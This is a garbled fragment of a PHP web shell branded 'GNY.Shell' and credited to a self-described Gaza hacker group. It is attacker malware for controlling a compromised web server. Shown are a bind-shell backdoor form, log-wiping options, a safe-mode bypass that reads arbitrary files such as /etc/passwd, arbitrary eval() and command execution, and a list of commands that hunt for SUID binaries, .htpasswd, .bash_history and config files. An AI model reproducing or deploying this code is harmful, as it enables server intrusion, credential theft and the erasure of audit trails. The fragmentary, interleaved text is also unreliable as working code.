\r\n\t\t\t\r\n\t\t\tHost:

\r\n\t\t\tLength (seconds):

\r\n\t\t\t
"; } echo ""; } if ( $act == "shbd" ) { $msg = $_POST['backcconnmsg']; $emsg = $_POST['backcconnmsge']; echo "Bind Shell Backdoor:

\r\nBind Port: \r\n\r\n
"; echo "$msg"; echo "$emsg"; echo ""; } echo "

Enter:

\r\n\tls -la /etc/valiases
\r\n\t
chmod xxxx
\r\n\t
\r\n Kernel Info:
\r\n \r\n \r\n
\r\n

\r\n
\r\n

\r\n\r\n\r\n

\r\nFunc"; echo "tions\r\n \r\nMake Dir\r\n \r\nGo Dir\r\n

\r\n\r\n
\r\n \r\n"; echo "\r\n Wipe Logs Using zap2 (*nix)\r\n Wipe Logs Using ClearLogs (Windows)\r\n
\r\n
\r\n \r\n
\r\n\r\n \r\n
\r\n\r\n\r\n
\r\n
"; echo $wdt; echo "\r\n
\r\n \r\n
\r\n\r\n\r\n
\r\n
\r\n \r\n\r\n
\r\n

\r\nAliases\r\n \r\nMake File\r\n \r\nGo File\r\n

\r\n"; if ( !$win ) { $cmdaliases = array( , array( "Currently Logged in Users", "w" ), array( "Last User to Connect", "lastlog" ), array( "Find Users Without a Password", "cut -d: -f1,2,3 /etc/passwd | grep ::" ), array( "Is /etc Writable?", "find /etc/ -type f -perm -o+w 2> /dev/null" ), array( "Installed Downloaders", "which wget curl w3m lynx" ), array( "Open Ports", "netstat -an | grep -i listen" ), array( "Box Uptime", "uptime" ), array( "System Variables", "set" ), array( "ARP table", "arp -a" ), array( "Patch Level for RedHat 7.0", "rpm -qa" ), array( "Network Interfaces", "ifconfig" ), array( "Mounted Filesystems", "mount" ), array( "Create 1GB File in Current Dir (for h00lyshit)", "dd if=/dev/urandom of=./bigfile count=2M" ), array( "Find Suid Bins", "find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null" ), array( "Find All Suid Files", "find / -type f -perm -04000 -ls" ), array( "Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls" ), array( "Find All Sgid Files", "find / -type f -perm -02000 -ls" ), array( "Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls" ), array( "Find config.inc.php Files", "find / -type f -name config.inc.php" ), array( "Find config* Files", "find / -type f -name \"config*\"" ), array( "Find config* Files in Current Dir", "find . -type f -name \"config*\"" ), array( "Find All Writable Folders and Files", "find / -perm -2 -ls" ), array( "Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls" ), array( "Find All service.pwd Files", "find / -type f -name service.pwd" ), array( "Find service.pwd Files in Current Dir", "find . -type f -name service.pwd" ), array( "Find All .htpasswd Files", "find / -type f -name .htpasswd" ), array( "Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd" ), array( "Find All .bash_history Files", "find / -type f -name .bash_history" ), array( "Find .bash_history Files in Current Dir", "find . -type f -name .bash_history" ), array( "Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc" ), array( "Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc" ), array( "List File Attributes on a Linux Second Extended File System", "lsattr -va" ) ); } else { $cmdaliases = array( , array( "Active Connections", "netstat -an" ), array( "ARP Table", "arp -a" ), array( "Net Shares", "net use" ), array( "IP Configuration", "ipconfig /all" ), array( "Disk Quotas", "fsutil quota query ".$pd[0] ), array( "Drive Type", "fsutil fsinfo drivetype ".$pd[0] ) ); } echo "
"; echo ""; foreach ( $cmdaliases as $als ) { echo " ".htmlspecialchars( $als[0] ).""; } echo "\r\n
\r\n
\r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n
\r\n
"; echo $wdt; echo "
\r\n\r\n \r\n
\r\n\r\n\r\n
\r\n\r\n
\r\n
\r\n

\r\n\r\n

\r\n

\r\nPHP Saf"; echo "e-Mode Bypass (Read File)

\r\n
\r\nFile: \r\n

\r\ne.g.: /etc/passwd or C:\\WINDOWS\\system32\\.SAM\r\n
\r\n\r\n"; if ( isset( $_GET['file'] ) ) { $test = ""; $temp = tempnam( $test, "cx" ); $file = $_GET['file']; $get = htmlspecialchars( $file ); echo "Trying To Get File ".$get."
"; if ( copy( "compress.zlib://".$file, $temp ) ) { $fichier = fopen( $temp, "r" ); $action = fread( $fichier, filesize( $temp ) ); fclose( $fichier ); $source = htmlspecialchars( $action ); echo "Start ".$get."

".$source."

Fin ".$get.""; unlink( $temp ); } else { echo "Sorry... File ".htmlspecialchars( $file )." doesn't exist or you don't have access."; } } echo " \r\nPHP Safe-Mode Bypass (Directory Listing)

\r\n
\r\nDir: \r\n

\r\ne.g.: /etc/ or C:\\\r\n
\r\n\r\n"; if ( isset( $_GET['directory'] ) ) { $chemin = $_GET['directory']; $files = glob( "$chemin*" ); echo "Trying To List Folder ".$chemin."

"; foreach ( $files as $filename ) { echo $filename."\n
"; } } echo "

\r\n
\r\n

Search
- regexp

Upload

"; echo $wdt; echo "

\r\n

\r\n .:[ GNY.Shell | Standard Edition | Generated in: "; echo round( getmicrotime( ) - starttime, 4 ); echo " ]:.\r\n
\r\n

\r\n\r\n
"; echo "جميع الحقوق محفوظه \r\nلقراصنة غزة هكر ( \r\nLiTo & SHALHOP & LE0N & vIrUS_HACKER & "; echo "\r\nclaw"; echo ") \r\n"; chdir( $lastdir ); gnyexit( ); ?>

  _____ _   ___     __ _____ _          _ _ \r\n / ____| \\ | \\ \\   / // ";
    echo "____| |        | | |\r\n| |                           |__   ___| | |\r\nGaZa-HacKeR\r\n| |__| | |\\  |  | | _ ____) | | | |  __/ | |\r\n \\_____|_| \\_|  |_|(_)_____/|_| |_|\\___|_|_|

\r\n \r\n

Fields:
"; foreach ( $tbl_struct as $field ) { $name = $field['Field']; echo "+ ".$name."
"; } echo "

"; echo $DISP_SERVER_SOFTWARE; echo "
Kernel: "; echo wordwrap( php_uname( ), 90, " ", 1 ); if ( $win ) { echo " (".exec( "ver" ).")"; } echo "	Safe-Mode: "; echo $hsafemode; echo "
"; if ( !$win ) { echo wordwrap( myshellexec( "id" ), 90, " ", 1 ); } else { echo "Running As: ".get_current_user( ); } echo "	Disabled PHP Functions: "; if ( "" == ( $df = ini_get( "disable_functions" ) ) ) { echo "NONE"; } else { echo " ".str_replace( ",", ", ", $df ).""; } echo ""; $curl_on = function_exists( "curl_version" ); echo " cURL: ".( $curl_on ? "ON" : "OFF" ); echo "
"; $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); if ( isset( $d ) ) { $d = realpath( "." ); } else if ( realpath( $d ) ) { $d = realpath( $d ); } $d = str_replace( "\\", DIRECTORY_SEPARATOR, $d ); if ( substr( $d, 0 - 1 ) != DIRECTORY_SEPARATOR ) { $d .= DIRECTORY_SEPARATOR; } $d = str_replace( "\\\\", "\\", $d ); $dispd = htmlspecialchars( $d ); $pd = $e = explode( DIRECTORY_SEPARATOR, substr( $d, 0, 0 - 1 ) ); $i = 0; if ( is_callable( "disk_free_space" ) ) { $free = disk_free_space( $d ); $total = disk_total_space( $d ); if ( $free === FALSE ) { $free = 0; } if ( $total === FALSE ) { $total = 0; } if ( $free < 0 ) { $free = 0; } if ( $total < 0 ) { $total = 0; } $used = $total - $free; $free_percent = round( 100 / ( $total / $free ), 2 ); echo "Free ".view_size( $free )." of ".view_size( $total )." (".$free_percent."%)"; } echo "	Server IP: ".gethostbyname( $_SERVER['HTTP_HOST'] )." - Your IP: ".$_SERVER['REMOTE_ADDR']."

\r\n
\r\n

".$donated_html."

"; } echo "

If login is null, login is owner of process.

If host is null, host is localhost (default).

If port is null, port is 3306 (default).

Please, fill the form:

Username	Password	Database

Host	Port

Home

"; $result = mysql_list_dbs( $sql_sock ); if ( !$result ) { echo mysql_smarterror( ); } echo " "; } echo "

"; $diplay = TRUE; if ( $sql_db ) { if ( !is_numeric( $c ) ) { $c = 0; } if ( $c == 0 ) { $c = "no"; } echo "

"; } } if ( in_array( $sql_act, $acts ) ) { echo "

Create new table:	Dump DB:

"; if ( !isset( $sql_act ) ) { echo "

Name	Value
".$row[0]."	".$row[1]."

"; mysql_free_result( $result ); } if ( $sql_act == "servervars" ) { $result = mysql_query( "SHOW VARIABLES", $sql_sock ); echo "Server variables:

"; echo "

Name	Value
".$row[0]."	".$row[1]."

ID	USER	HOST	DB	COMMAND	TIME	STATE	INFO	Action
".$row[0]."	".$row[1]."	".$row[2]."	".$row[3]."	".$row[4]."	".$row[5]."	".$row[6]."	".$row[7]."	Kill

"; if ( $sql_sock ) { $affected = mysql_affected_rows( $sql_sock ); if ( !is_numeric( $affected ) || $affected < 0 ) { $affected = 0; } echo "

Affected rows: ".$affected."

Owner/Group	"; $ow = posix_getpwuid( fileowner( $d ) ); $gr = posix_getgrgid( filegroup( $d ) ); $Var_3438[$row] = ( $ow['name'] ? $ow['name'] : fileowner( $d ) )."/".( $gr['name'] ? $gr['name'] : filegroup( $d ) ); } else { echo "
Perms	".view_perms_color( $d )."
Create time	".date( "d/m/Y H:i:s", filectime( $d ) )."
Access time	".date( "d/m/Y H:i:s", fileatime( $d ) )."
MODIFY time	".date( "d/m/Y H:i:s", filemtime( $d ) )."

".$debase64."

"; } echo " ^"; echo "
Base convertations:dec2hex -
\r\n

\r\n

\r\nSearch milw0rm for MD5 hash\r\n	\r\nSearch md5encryption.com for MD5 or SHA1 hash\r\n	\r\nSearch CsTeam for MD5 hash\r\n	\r\nSearch GData for MD5 hash\r\n
\r\n\r\n \r\n \r\n	\r\n\r\n \r\n \r\n\r\n	\r\n\r\n \r\n"; echo " \r\n\r\n	\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n

Owner Read Write Execute	Group Read Write Execute	World Read Write Execute

".md5_file( $v )."

".$v."

"; echo " \r\n

"; $act = "ls"; } if ( $act == "sha1file" ) { echo "SHA1 Checksum:
\r\n

".sha1_file( $v )."

".$v."

".htmlspecialchars( $ret )."

"; } else { echo $ret."
"; } @chdir( $olddir ); echo "Execution command"; } else if ( isset( $cmd_txt ) ) { $cmd_txt = TRUE; } echo "

\r\n \r\n \r\n "; if ( 0 < count( array_merge( $sess_data['copy'], $sess_data['cut'] ) ) && $usefsbuff ) { echo " "; } echo "

".$v."

".htmlspecialchars( $ret )."

"; } else { echo $ret."
"; } } else if ( $eval_txt ) { echo "

";
eval( $eval );
echo "

"; if ( $ft == "info" ) { echo "Information:

Path	".$d.$f."
Size	".view_size( filesize( $d.$f ) )."
MD5	".md5_file( $d.$f )."
Owner/Group	"; $ow = posix_getpwuid( fileowner( $d.$f ) ); $gr = posix_getgrgid( filegroup( $d.$f ) ); echo ( $ow['name'] ? $ow['name'] : fileowner( $d.$f ) )."/".( $gr['name'] ? $gr['name'] : filegroup( $d.$f ) ); } echo "
Perms	".view_perms_color( $d.$f )."
Create time	".date( "d/m/Y H:i:s", filectime( $d.$f ) )."
Access time	".date( "d/m/Y H:i:s", fileatime( $d.$f ) )."
MODIFY time	".date( "d/m/Y H:i:s", filemtime( $d.$f ) )."

".$a0."

".$a1."

".$a2."

"; } else if ( $ft == "html" ) { if ( $white ) { @ob_clean( ); } echo $r; if ( $white ) { gnyexit( ); } } else if ( $ft == "txt" ) { echo "

".htmlspecialchars( $r )."

"; } else if ( $ft == "ini" ) { echo "

";
            var_dump( parse_ini_file( $d.$f, TRUE ) );
            echo "

"; } else if ( $ft == "rename" ) { echo "\r\n \r\n \r\n \r\n \r\n \r\n New name:
\r\n

";
            $v = explode( "|", $r );
            echo $v[0]."
";
            var_dump( unserialize( $v[1] ) );
            echo "

";
            var_dump( unserialize( base64_decode( $r ) ) );
            echo "

"; } } echo "

"; if ( !isset( $white ) ) { @ob_clean( ); } highlight_file( $d.$f ); if ( !isset( $white ) ) { gnyexit( ); } echo "